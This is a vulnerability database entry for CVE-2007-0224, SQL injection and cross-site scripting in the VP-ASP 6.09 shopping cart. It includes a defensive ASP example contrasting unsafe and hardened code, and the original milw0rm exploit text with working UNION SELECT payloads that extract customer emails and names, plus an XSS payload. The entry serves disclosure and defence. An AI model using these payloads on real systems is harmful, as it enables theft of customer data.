Virtual Programming VP-ASP Multiple Cross-Site Scripting and SQL Injection Vulnerabilities

Vulnerability ID: 1111990    Vulnerability type: SQL injection
Published: 2007-01-11    Updated: 2007-01-12
CVE ID: CVE-2007-0224    CNNVD-ID: CNNVD-200701-175
Platform: ASP    CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/3115
https://www.securityfocus.com/bid/82014
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-175
|Vulnerability Details
Virtual Programming VP-ASP is a commercial e-commerce shopping cart application written in ASP. VP-ASP contains an input validation vulnerability in its handling of user requests; a remote attacker can exploit it to obtain sensitive information or perform unauthorized operations on the database. The VP-ASP scripts shopgiftregsearch.asp and shopcustadmin.asp do not adequately check or filter the user-supplied LoginLastname and msg parameters. By injecting crafted SQL statements or script code, an attacker may obtain sensitive information from other users' browsers and may also modify the database.
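The two defects described above come down to the same root cause: untrusted request data reaching a SQL statement (LoginLastname) and an HTML response (msg) without being treated as data. The classic ASP snippet below is an added illustration of each weak pattern next to its hardened form; it is not VP-ASP's own code. The connection object `objConn`, the helper names, the selected columns and the parameter size are assumptions chosen for the example; the table `registrant` and its `lastname` column are taken from the advisory's own PoC.

```asp
<%
' Added illustrative example, not code from VP-ASP: each weak pattern the
' advisory describes, followed by a hardened version.
' Assumptions: objConn is an open ADODB.Connection; the "registrant" table and
' its "lastname"/"email" columns come from the PoC above; everything else is a
' placeholder.
Option Explicit

' --- 1. SQL injection (shopgiftregsearch.asp, LoginLastname parameter) ---

' Weak pattern: the query-string value is spliced into the SQL text, so a
' quote inside it ends the literal and the remainder is parsed as SQL.
Function LookupByLastnameUnsafe(objConn, strLastname)
    Dim strSql
    strSql = "SELECT lastname, email FROM registrant WHERE lastname = '" _
             & strLastname & "'"
    Set LookupByLastnameUnsafe = objConn.Execute(strSql)
End Function

' Hardened: a parameterised ADODB.Command. The value is bound as a parameter,
' so quotes or SQL keywords inside it can never change the statement shape.
Function LookupByLastnameSafe(objConn, strLastname)
    Dim objCmd
    Set objCmd = Server.CreateObject("ADODB.Command")
    Set objCmd.ActiveConnection = objConn
    objCmd.CommandText = "SELECT lastname, email FROM registrant WHERE lastname = ?"
    objCmd.CommandType = 1                      ' adCmdText
    ' CreateParameter(Name, Type, Direction, Size, Value)
    ' adVarChar = 200, adParamInput = 1, size 64 is an assumed column width
    objCmd.Parameters.Append objCmd.CreateParameter("lastname", 200, 1, 64, strLastname)
    Set LookupByLastnameSafe = objCmd.Execute
End Function

' --- 2. Reflected cross-site scripting (shopcustadmin.asp, msg parameter) ---

' Weak pattern: the msg value is written straight into the page, so markup
' or script inside it is interpreted by every visitor's browser.
Sub ShowMessageUnsafe()
    Response.Write "<p class=""msg"">" & Request.QueryString("msg") & "</p>"
End Sub

' Hardened: HTML-encode on output. Server.HTMLEncode turns <, >, & and "
' into entities, so the browser renders the value as text only.
Sub ShowMessageSafe()
    Response.Write "<p class=""msg"">" _
                   & Server.HTMLEncode(Request.QueryString("msg")) & "</p>"
End Sub
%>
```

Binding the value as a parameter fixes the injection at its source rather than by blacklisting characters, and encoding at the point of output (not on input) is what keeps the msg value harmless regardless of where it came from; both are the standard mitigations for the vulnerability classes this record covers.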
|Vulnerability EXP
*******************************************************************************
# Title   :  VP-ASP Shopping Cart 6.09 Remote Multiple Vulnerabilities
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.vpasp.com
# $$      :  $49.00 - $350.00 - $495.00

*******************************************************************************

[[SQL]]---------------------------------------------------------

http://[target]/[path]//shopgiftregsearch.asp?LoginLastname=[SQL]

Example:

//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1

This information goes to the login page.

[[/SQL]]

[[XSS]]---------------------------------------------------------

http://[target]/[path]//shopcustadmin.asp?msg=[XSS]

Example:

//shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E

[[/XSS]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# I'm not a hacker!

# milw0rm.com [2007-01-11]
|Affected Products
Virtual Programming Vp-Asp 6.09
|References

Source: MILW0RM
Name: 3115
Link: http://www.milw0rm.com/exploits/3115
Source: SECUNIA
Name: 23699
Link: http://secunia.com/advisories/23699
Source: OSVDB
Name: 32732
Link: http://osvdb.org/32732
Source: XF
Name: vpasp-shopgift-sql-injection(31447)
Link: http://xforce.iss.net/xforce/xfdb/31447
Source: MILW0RM
Name: 3115
Link: http://milw0rm.com/exploits/3115